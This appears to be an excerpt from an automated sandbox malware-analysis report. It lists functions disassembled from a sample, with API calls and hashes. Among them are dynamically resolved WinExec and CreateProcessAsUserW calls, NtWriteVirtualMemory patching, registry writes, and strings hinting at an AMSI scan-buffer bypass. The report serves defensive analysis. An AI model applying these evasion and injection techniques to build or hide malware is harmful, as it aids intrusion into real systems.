                                                                        control_flow_graph 12454 2c51a8c-2c51a9b 12455 2c51aa1-2c51aa5 12454->12455 12456 2c51b6c-2c51b6f 12454->12456 12459 2c51aa7-2c51aae 12455->12459 12460 2c51b08-2c51b11 12455->12460 12457 2c51b75-2c51b7f 12456->12457 12458 2c51c5c-2c51c60 12456->12458 12464 2c51b81-2c51b8d 12457->12464 12465 2c51b3c-2c51b49 12457->12465 12461 2c51c66-2c51c6b 12458->12461 12462 2c516e8-2c5170b call 2c51644 VirtualFree 12458->12462 12466 2c51ab0-2c51abb 12459->12466 12467 2c51adc-2c51ade 12459->12467 12460->12459 12463 2c51b13-2c51b27 Sleep 12460->12463 12484 2c51716 12462->12484 12485 2c5170d-2c51714 12462->12485 12463->12459 12473 2c51b2d-2c51b38 Sleep 12463->12473 12475 2c51bc4-2c51bd2 12464->12475 12476 2c51b8f-2c51b92 12464->12476 12465->12464 12474 2c51b4b-2c51b5f Sleep 12465->12474 12468 2c51ac4-2c51ad9 12466->12468 12469 2c51abd-2c51ac2 12466->12469 12471 2c51ae0-2c51af1 12467->12471 12472 2c51af3 12467->12472 12471->12472 12479 2c51af6-2c51b03 12471->12479 12472->12479 12473->12460 12474->12464 12481 2c51b61-2c51b68 Sleep 12474->12481 12477 2c51b96-2c51b9a 12475->12477 12480 2c51bd4-2c51bd9 call 2c514c0 12475->12480 12476->12477 12482 2c51bdc-2c51be9 12477->12482 12483 2c51b9c-2c51ba2 12477->12483 12479->12457 12480->12477 12481->12465 12482->12483 12491 2c51beb-2c51bf2 call 2c514c0 12482->12491 12487 2c51bf4-2c51bfe 12483->12487 12488 2c51ba4-2c51bc2 call 2c51500 12483->12488 12489 2c51719-2c51723 12484->12489 12485->12489 12494 2c51c00-2c51c28 VirtualFree 12487->12494 12495 2c51c2c-2c51c59 call 2c51560 12487->12495 12491->12483
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000,?,?,00000000,02C51FE4), ref: 02C51B17
                                                                        • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02C51FE4), ref: 02C51B31
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 94240fb08379f8151650cc9323b30bd183d2878b131720e249cadc6bb782ef8f
                                                                        • Instruction ID: f42c1c4c519e37bdca94d8cce8e70b9d410156caec3178f3f15be2b7647dc6cc
                                                                        • Opcode Fuzzy Hash: 94240fb08379f8151650cc9323b30bd183d2878b131720e249cadc6bb782ef8f
                                                                        • Instruction Fuzzy Hash: 0A51E4716412608FD725CF68C988756BBD0AF85314F1C86AEDD4CCB282D7F0D985CB99
                                                                        Function 02C6E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C6E5F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CheckConnectionInternet
                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                        • API String ID: 3847983778-3852638603
                                                                        • Opcode ID: 9329c3f13980c85b7a8b36c7136d23423244337fe40d42d9052ccfc5c518e177
                                                                        • Instruction ID: 4003dbb6fc28eed4bdf43764a7e5e134dd27b835d46db3e563e2b070e2e79fea
                                                                        • Opcode Fuzzy Hash: 9329c3f13980c85b7a8b36c7136d23423244337fe40d42d9052ccfc5c518e177
                                                                        • Instruction Fuzzy Hash: 1A410B35A0011C9BEB24EFA4D881EEEB3FAEF88700F104422E441E7250DA74ED81EF59
                                                                        Function 02C68788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C68814
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                        • String ID: CreateProcessAsUserW$Kernel32
                                                                        • API String ID: 3130163322-2353454454
                                                                        • Opcode ID: e903cfcfb33dc734b8ef484bad905fe2ae1e1ba2c469aa8aa3441643c5f077d9
                                                                        • Instruction ID: 2ea7519e22cb6d93a578598fd4c6dae70514cd6a31fb029bef8d7ba16bba1190
                                                                        • Opcode Fuzzy Hash: e903cfcfb33dc734b8ef484bad905fe2ae1e1ba2c469aa8aa3441643c5f077d9
                                                                        • Instruction Fuzzy Hash: C611F3B2640248BFEB50EFACDC85FAA77EDEB0C700F514520BA08E3200C634ED549B68
                                                                        Function 02C685BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • WinExec.KERNEL32(?,?), ref: 02C68624
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                        • String ID: Kernel32$WinExec
                                                                        • API String ID: 2292790416-3609268280
                                                                        • Opcode ID: 6fcde1bdeda4c8e15ce3be0fc9a348943df16c977eba0e81eb88a41848371aca
                                                                        • Instruction ID: 141f2440eedc5f9ae7755a9afc1b1e3176835723935b262a5f866250628396d9
                                                                        • Opcode Fuzzy Hash: 6fcde1bdeda4c8e15ce3be0fc9a348943df16c977eba0e81eb88a41848371aca
                                                                        • Instruction Fuzzy Hash: 2201A470684304BFEB14EFA4DC45F6E77EDEB08700F904520B904D2640D674ED589A29
                                                                        Function 02C685BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • WinExec.KERNEL32(?,?), ref: 02C68624
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                        • String ID: Kernel32$WinExec
                                                                        • API String ID: 2292790416-3609268280
                                                                        • Opcode ID: 5ceefb7c5e08352fb3d15b21974d962e5a83e47da42f19e483ca3f062992eead
                                                                        • Instruction ID: 2900b50a91360e9a35af250778bcc9d34ecd05a88b4c0cc0a86415307fc2f273
                                                                        • Opcode Fuzzy Hash: 5ceefb7c5e08352fb3d15b21974d962e5a83e47da42f19e483ca3f062992eead
                                                                        • Instruction Fuzzy Hash: ABF0A470684304BFEB14EFA4DC45F6E77ADEB08700F904520B904D2640D674ED589A29
                                                                        Function 02C65C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02C65D74,?,?,02C63900,00000001), ref: 02C65C88
                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02C65D74,?,?,02C63900,00000001), ref: 02C65CB6
                                                                          • Part of subcall function 02C57D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02C63900,02C65CF6,00000000,02C65D74,?,?,02C63900), ref: 02C57DAA
                                                                          • Part of subcall function 02C57F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02C63900,02C65D11,00000000,02C65D74,?,?,02C63900,00000001), ref: 02C57FB7
                                                                        • GetLastError.KERNEL32(00000000,02C65D74,?,?,02C63900,00000001), ref: 02C65D1B
                                                                          • Part of subcall function 02C5A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02C5C3D9,00000000,02C5C433), ref: 02C5A797
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                        • String ID:
                                                                        • API String ID: 503785936-0
                                                                        • Opcode ID: 2f656bb3870a3c4f974231b51c026d8edf26ec9c01090f8d139820b39b43e22e
                                                                        • Instruction ID: 501d24d6584bf22581f14c46b49cfc2c90e3093e9a2a25280b1e38d5f3fe8cef
                                                                        • Opcode Fuzzy Hash: 2f656bb3870a3c4f974231b51c026d8edf26ec9c01090f8d139820b39b43e22e
                                                                        • Instruction Fuzzy Hash: 8031D770E006599FDB00EFA4C9857EDBBF6AF48700F904165E904AB380D7759E84DFA5
                                                                        Function 02C6F212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02DCBA58), ref: 02C6F258
                                                                        • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C6F2C3), ref: 02C6F290
                                                                        • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C6F2C3), ref: 02C6F29B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenValue
                                                                        • String ID:
                                                                        • API String ID: 779948276-0
                                                                        • Opcode ID: af84a5a4b3a469cb43555be89b9da18a3d790012dbe66188b129c58d9e085467
                                                                        • Instruction ID: edae75f932f5b8c51fba06123faaad38e9d2e7e9d882c2907f044e6e7ae0c347
                                                                        • Opcode Fuzzy Hash: af84a5a4b3a469cb43555be89b9da18a3d790012dbe66188b129c58d9e085467
                                                                        • Instruction Fuzzy Hash: 20116D71644205AFEB14EFA8E882D9D77EDEB08300B900426F905D7650DB70EE80DF58
                                                                        Function 02C6F214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02DCBA58), ref: 02C6F258
                                                                        • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C6F2C3), ref: 02C6F290
                                                                        • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C6F2C3), ref: 02C6F29B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenValue
                                                                        • String ID:
                                                                        • API String ID: 779948276-0
                                                                        • Opcode ID: d24f702b6762f29d4039a9160fd2c1234b337e00b2001150209a066a4a12df4d
                                                                        • Instruction ID: 5c4a1fbbd9cd551b84069fcecada0aafde46d429a8a7e76d21a11b892bedfc63
                                                                        • Opcode Fuzzy Hash: d24f702b6762f29d4039a9160fd2c1234b337e00b2001150209a066a4a12df4d
                                                                        • Instruction Fuzzy Hash: 19116D71644205AFEB14EFA8E882D9D77EDEB08300B900426F905D7650DB70EE80DF58
                                                                        Function 02C5E364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 5b0d7a0642fdee41f9497184701964693d6bd6af88a28030bed4084e680e1bbe
                                                                        • Instruction ID: 0e1839c3db8f31a1661d389861d6b8380413fc03c9e4c29ed0d718c2ff2240b0
                                                                        • Opcode Fuzzy Hash: 5b0d7a0642fdee41f9497184701964693d6bd6af88a28030bed4084e680e1bbe
                                                                        • Instruction Fuzzy Hash: 21F04F24708230C79B247B3A8E8466A379B5F843807101476EC4EDB115DB74CFC5D76E
                                                                        Function 02C54D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SysFreeString.OLEAUT32(02C6F4A4), ref: 02C54C6E
                                                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 02C54D5B
                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02C54D6D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: String$Free$Alloc
                                                                        • String ID:
                                                                        • API String ID: 986138563-0
                                                                        • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                        • Instruction ID: 6b20ceafbb845493674a6bd092a4ac1986bb96d73231b55bfe4edcb7f9022607
                                                                        • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                        • Instruction Fuzzy Hash: 7DE012B82056255EEF286F219D44B37336AAFC1740B188499EC00CE154DB78E5C0BD3D
                                                                        Function 02C670DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SysFreeString.OLEAUT32(?), ref: 02C673DA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FreeString
                                                                        • String ID: H
                                                                        • API String ID: 3341692771-2852464175
                                                                        • Opcode ID: cba5732f5e0fce89ea263d740205a2d9cdd87ae2a38097a63749cb98d593d8c4
                                                                        • Instruction ID: 004b530fd4a9d5fb98412ec685b39a318fddcd07b341ae1215d818585898eeaa
                                                                        • Opcode Fuzzy Hash: cba5732f5e0fce89ea263d740205a2d9cdd87ae2a38097a63749cb98d593d8c4
                                                                        • Instruction Fuzzy Hash: 6EB1B074A01608DFDB15CF99D484AADFBF6FF89318F248569E809AB320D730A949CF50
                                                                        Function 02C5E760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantCopy.OLEAUT32(00000000,00000000), ref: 02C5E781
                                                                          • Part of subcall function 02C5E364: VariantClear.OLEAUT32(?), ref: 02C5E373
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCopy
                                                                        • String ID:
                                                                        • API String ID: 274517740-0
                                                                        • Opcode ID: 1747e631e0fbf1811fb11e1d2180eced7205240a8638cd28ecea6c60a0185af6
                                                                        • Instruction ID: 767783504548591b5ca6915f467f2f86667e57c6357a7b8811266c1c6cf5455e
                                                                        • Opcode Fuzzy Hash: 1747e631e0fbf1811fb11e1d2180eced7205240a8638cd28ecea6c60a0185af6
                                                                        • Instruction Fuzzy Hash: D111822070023087CB34AF2AC8C4A6677DAAF857907108466ED4A8B215DB34CEC0EA6A
                                                                        Function 02C5E3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: InitVariant
                                                                        • String ID:
                                                                        • API String ID: 1927566239-0
                                                                        • Opcode ID: 4d6d333f01d282f7785365285abc890840ca403d6672a7bb69f1dc69dfff8039
                                                                        • Instruction ID: 61fc9edae86eb08fdf77b6499a12a17f536e50ef8d2b3d5bb93f92a66a5b8fa4
                                                                        • Opcode Fuzzy Hash: 4d6d333f01d282f7785365285abc890840ca403d6672a7bb69f1dc69dfff8039
                                                                        • Instruction Fuzzy Hash: 74312B72A00228ABDB11DFE9D884AAA77E9EB4C314F444565FD09D3250D734EBD0CBA9
                                                                        Function 02C689D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                          • Part of subcall function 02C67D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C67DEC
                                                                          • Part of subcall function 02C68338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02C683C2), ref: 02C683A4
                                                                        • FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
